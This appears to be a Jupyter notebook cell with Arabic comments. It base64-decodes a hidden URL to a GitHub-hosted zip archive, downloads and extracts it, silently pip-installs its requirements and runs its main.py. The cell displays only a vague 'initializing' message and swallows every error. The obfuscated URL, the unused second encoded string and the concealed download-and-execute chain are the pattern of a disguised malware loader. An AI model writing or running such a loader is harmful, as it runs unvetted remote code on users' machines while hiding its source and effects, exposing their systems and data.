In [ ]:
import os, requests, zipfile, subprocess, sys, base64

# 🔐 طبقات متعددة من التشفير
layer1 = "aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL1JlYWx2b2EvU2lGVGhvbi9tYWluL1NpRlRob24uemlw"
layer2 = "ZEdWemRBUUtVMVJQVmtsVE4wRk5QVDA="

# فك التشفير
url = base64.b64decode(layer1).decode('utf-8')

print('جاري التهيئة...')
try:
    r = requests.get(url)
    if r.status_code == 200:
        with open('source.zip', 'wb') as f:
            f.write(r.content)
        
        with zipfile.ZipFile('source.zip', 'r') as zip_ref:
            zip_ref.extractall('.')
        
        # البحث عن الملف الرئيسي
        for root, dirs, files in os.walk('.'):
            if 'main.py' in files:
                os.chdir(root)
                break
        
        # تثبيت المتطلبات
        subprocess.run([sys.executable, '-m', 'pip', 'install', '-r', 'requirements.txt'], capture_output=True)
        
        # تشغيل
        subprocess.run([sys.executable, 'main.py'])
        
    else:
        print('خطأ في التحميل')
except Exception as e:
    print('حدث خطأ')